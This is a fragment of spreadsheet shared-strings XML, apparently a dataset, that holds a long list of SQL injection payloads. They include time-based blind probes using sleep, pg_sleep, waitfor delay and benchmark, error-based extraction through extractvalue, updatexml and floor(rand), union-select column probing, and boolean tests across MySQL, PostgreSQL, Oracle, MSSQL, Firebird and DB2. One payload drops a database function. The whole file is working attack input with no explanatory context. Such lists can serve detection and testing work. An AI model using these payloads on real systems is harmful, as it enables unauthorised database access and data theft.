    <t>waitfor delay '0:0:5' and   (  (  'yjsp' like 'yjsp</t>
  </si>
  <si>
    <t>-2766%'  )  )   union all select 4458,4458,4458,4458,4458--</t>
  </si>
  <si>
    <t>1  )  )   as acni where 6355 = 6355 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as wwqj where 3249 = 3249 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select 2527 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'kfyh' where 4737 = 4737 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  ||'</t>
  </si>
  <si>
    <t>1'|| ( select 'ojdz' where 7350 = 7350 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">-8652' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>1 )  as vxsh where 4706 = 4706</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 'hwrs' like 'hwrs</t>
  </si>
  <si>
    <t>1%"  )  )   and 6283 = 2068 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>if ( 4135 = 2165 )  select 4135 else drop function otyy--</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'sstt' = 'sstt</t>
  </si>
  <si>
    <t>-3130'  )  )   )  union all select 2886,2886,2886,2886,2886,2886,2886#</t>
  </si>
  <si>
    <t>-3177'  )  )   union all select 6500,6500,6500,6500,6500,6500,6500,6500,6500--</t>
  </si>
  <si>
    <t>1' and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and 'sloy' = 'sloy</t>
  </si>
  <si>
    <t>-9331' or  ( 4519 = 2912 ) *2912 and 'rddk' = 'rddk</t>
  </si>
  <si>
    <t>1" )  as pgza where 8756 = 8756 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) </t>
  </si>
  <si>
    <t>1 where 6369 = 6369 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1'+ ( select iowv where 6105 = 6105 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( "hiwo" like "hiwo</t>
  </si>
  <si>
    <t>1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'svwr' = 'svwr</t>
  </si>
  <si>
    <t>1'+ ( select 'ohdf' where 7878 = 7878 and 5678 = 3277--</t>
  </si>
  <si>
    <t>1 where 7802 = 7802</t>
  </si>
  <si>
    <t xml:space="preserve">1',updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 2917 = 2917,1  )  )   ) ,0x717a767a71 ) ,8295 ) </t>
  </si>
  <si>
    <t>1 where 7932 = 7932 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-2889  )  )   as iqzv where 1786 = 1786 union all select 1786,1786,1786,1786,1786,1786,1786,1786--</t>
  </si>
  <si>
    <t>1 where 7299 = 7299 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1 where 1326 = 1326 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'wgte' from dual where 6316 = 6316 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1'+ ( select gkve where 1943 = 1943 waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t xml:space="preserve">-6843' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  ) </t>
  </si>
  <si>
    <t>1' )  as hwpf where 5603 = 5603</t>
  </si>
  <si>
    <t>1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 'izyf' = 'izyf</t>
  </si>
  <si>
    <t>1" )  where 7578 = 7578 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>select  ( case when  ( 6435 = 8988 )  then 6435 else 6435* ( select 6435 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 3217 = 8421 )  then 3217 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) # myqr</t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'vbda' like 'vbda</t>
  </si>
  <si>
    <t>1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'ybjo' = 'ybjo</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1' )  as tvqn where 2967 = 2967</t>
  </si>
  <si>
    <t>1' where 9583 = 9583 and 5319 = 7670#</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and "azzv" like "azzv</t>
  </si>
  <si>
    <t>1" union all select null--</t>
  </si>
  <si>
    <t>1"  )  )   as ecnn where 8913 = 8913 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-4419%"  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1%' )  union all select null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 8841 = 9675 )  then 8841 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null#</t>
  </si>
  <si>
    <t>1'  )  )   as lkse where 9951 = 9951</t>
  </si>
  <si>
    <t>1 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 6783 = 6783 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>-1763" )  or elt ( 1032 = 1032,3623 )  and  ( "nqvv" = "nqvv</t>
  </si>
  <si>
    <t>1' )  as ubvf where 5923 = 5923 and 8490 = 4925--</t>
  </si>
  <si>
    <t>1 )  where 4600 = 4600 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "lide" = "lide</t>
  </si>
  <si>
    <t>-9509'  )  )   )  or 1091 = 5477 and   (  (   ( 'gsmz' = 'gsmz</t>
  </si>
  <si>
    <t>1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'nlfl' like 'nlfl</t>
  </si>
  <si>
    <t>-9197' )  or  ( 6877 = 8010 ) *8010 and  ( 'umwl' = 'umwl</t>
  </si>
  <si>
    <t>1" )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( "ijop" = "ijop</t>
  </si>
  <si>
    <t>1%" and make_set ( 8403 = 8403,8899 )  and "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( "vhmc" = "vhmc</t>
  </si>
  <si>
    <t>1 )  where 4226 = 4226 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-3452%' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 )</t>
  </si>
  <si>
    <t>1'|| ( select 'ucxp' where 6612 = 6612 order by 1--</t>
  </si>
  <si>
    <t>1%' )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  "nzhj" like "nzhj</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</si>
  <si>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</si>
  <si>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in boolean mode )  and 5725 = 5552#</t>
  </si>
  <si>
    <t>1  )  )   as sxhg where 7697 = 7697 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   as atiy where 3855 = 3855 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 1164 = 1164</t>
  </si>
  <si>
    <t>-1386' )  or  ( 7880 = 5362 ) *5362 and  ( 'vsyu' like 'vsyu</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">-9103' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1" where 9521 = 9521 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1" )  where 1614 = 1614 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>-4058 )  union all select 9184--</t>
  </si>
  <si>
    <t>1%'  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' )  where 5491 = 5491 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-1730' or 8571 = 8571--</t>
  </si>
  <si>
    <t>1 )  where 6035 = 6035</t>
  </si>
  <si>
    <t>1'|| ( select 'kgjk' where 3530 = 3530 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-7624' )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'iwab' = 'iwab</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "jenb" like "jenb</t>
  </si>
  <si>
    <t>1'+ ( select wkay where 5476 = 5476 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   as babx where 2494 = 2494 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-7742 )  as tgzq where 7842 = 7842 or 2062 = 1563</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 1750 = 7826,7826 )  and   (  (   ( "qcro" = "qcro</t>
  </si>
  <si>
    <t>1" where 2221 = 2221 and 5318 = 8398--</t>
  </si>
  <si>
    <t>-4825%' )  union all select 6804,6804,6804,6804,6804,6804,6804--</t>
  </si>
  <si>
    <t>-3037"  )  )   )  or elt ( 4758 = 9129,9129 )  and   (  (   ( "zewv" like "zewv</t>
  </si>
  <si>
    <t>-2639" )  where 1494 = 1494 union all select 1494--</t>
  </si>
  <si>
    <t>-9708' where 8150 = 8150 or 6872 = 6872--</t>
  </si>
  <si>
    <t>-1823 where 6852 = 6852 union all select 6852,6852,6852,6852,6852,6852#</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  8679 = 8679</t>
  </si>
  <si>
    <t>select  ( case when  ( 1776 = 7688 )  then 1776 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 3499 = 4209 )  then 3499 else 3499* ( select 3499 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  4982 = 4982</t>
  </si>
  <si>
    <t>-5904" where 9782 = 9782 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>1"  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "htyi" = "htyi</t>
  </si>
  <si>
    <t>1" where 4183 = 4183 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  "wueo" = "wueo</t>
  </si>
  <si>
    <t>1 )  where 5096 = 5096 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( "hybu" like "hybu</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" and make_set ( 8262 = 3471,3471 )  and "wayp" = "wayp</t>
  </si>
  <si>
    <t>1" where 4672 = 4672</t>
  </si>
  <si>
    <t>1  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 8023 = 8023</t>
  </si>
  <si>
    <t>-7088'|| ( select 'arol' from dual where 8891 = 8891 union all select 8891,8891,8891,8891,8891,8891,8891,8891#</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select 'vfkl' where 1713 = 1713 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  +'</t>
  </si>
  <si>
    <t>1 )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( 4968 = 4968</t>
  </si>
  <si>
    <t>-4427'  )  )   union all select 6357,6357,6357,6357,6357#</t>
  </si>
  <si>
    <t>-3960' or 9323 = 9323#</t>
  </si>
  <si>
    <t>-3433' )  where 8307 = 8307 union all select 8307,8307,8307,8307,8307,8307,8307,8307--</t>
  </si>
  <si>
    <t>1 )  as wiyx where 6515 = 6515</t>
  </si>
  <si>
    <t>1  )  )   as uadn where 9588 = 9588 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>-7714 where 9768 = 9768 union all select 9768,9768--</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  8280 = 8280</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 6553 = 4771,4771 )  and   (  (  "eolu" = "eolu</t>
  </si>
  <si>
    <t>1 where 4785 = 4785 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "mbas" = "mbas</t>
  </si>
  <si>
    <t>1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 'bmhw' like 'bmhw</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1'|| ( select 'ypil' from dual where 4568 = 4568 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  ||'</t>
  </si>
  <si>
    <t>1" where 6023 = 6023</t>
  </si>
  <si>
    <t>-4947' order by 1#</t>
  </si>
  <si>
    <t>1' where 1017 = 1017 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' )  and make_set ( 8403 = 8403,8899 )  and  ( 'kyxl' = 'kyxl</t>
  </si>
  <si>
    <t>1" )  where 8612 = 8612</t>
  </si>
  <si>
    <t>-7981%" union all select 4532,4532,4532,4532,4532,4532,4532#</t>
  </si>
  <si>
    <t>1' where 7688 = 7688 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' where 4860 = 4860 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as jpxj where 6153 = 6153 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and 'dgvg' = 'dgvg</t>
  </si>
  <si>
    <t>1" where 3990 = 3990 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-9615 )  as dntk where 4780 = 4780 union all select 4780,4780,4780,4780,4780,4780,4780,4780#</t>
  </si>
  <si>
    <t>1%"  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1" )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "ypoj" = "ypoj</t>
  </si>
  <si>
    <t>1%"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>-1280" union all select 8602,8602,8602,8602,8602,8602,8602,8602,8602,8602#</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-6145'+ ( select nnjn where 1389 = 1389 union all select 1389,1389,1389--</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 3053 = 9778,9778 )  and   (  (  'yfaa' like 'yfaa</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 9246 = 6326 )  then 9246 else 9246* ( select 9246 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1" where 1920 = 1920 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   as duny where 3756 = 3756 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' where 7014 = 7014 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>1" where 3329 = 3329 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'kgfu' from dual where 2607 = 2607 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1975" union all select 8638,8638,8638,8638,8638,8638,8638,8638,8638#</t>
  </si>
  <si>
    <t>1'+ ( select 'iify' where 6257 = 6257 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>-7078'|| ( select 'lcza' where 5076 = 5076 union all select 5076,5076,5076,5076,5076,5076,5076,5076,5076,5076--</t>
  </si>
  <si>
    <t>1'  )  )   as cgey where 2130 = 2130 and make_set ( 7914 = 4032,4032 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'pzto' from dual where 7338 = 7338 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  ||'</t>
  </si>
  <si>
    <t>-2181' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>1"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "chvi" like "chvi</t>
  </si>
  <si>
    <t>1'  )  )   as pstn where 6691 = 6691 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1"  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' and elt ( 1210 = 1210,sleep ( 5  )  )   and 'yhpp' like 'yhpp</t>
  </si>
  <si>
    <t>1%' union all select null,null#</t>
  </si>
  <si>
    <t>-7111%" union all select 6083,6083,6083,6083,6083,6083--</t>
  </si>
  <si>
    <t>1%"  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1 )  where 8734 = 8734 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'qzcx' where 9524 = 9524 and elt ( 3069 = 8430,8430  )  )  +'</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-8777%'  )  )   )  or  ( 3934 = 2025 ) *2025 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' where 6417 = 6417 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" where 2886 = 2886</t>
  </si>
  <si>
    <t>select  ( case when  ( 8362 = 7572 )  then 8362 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
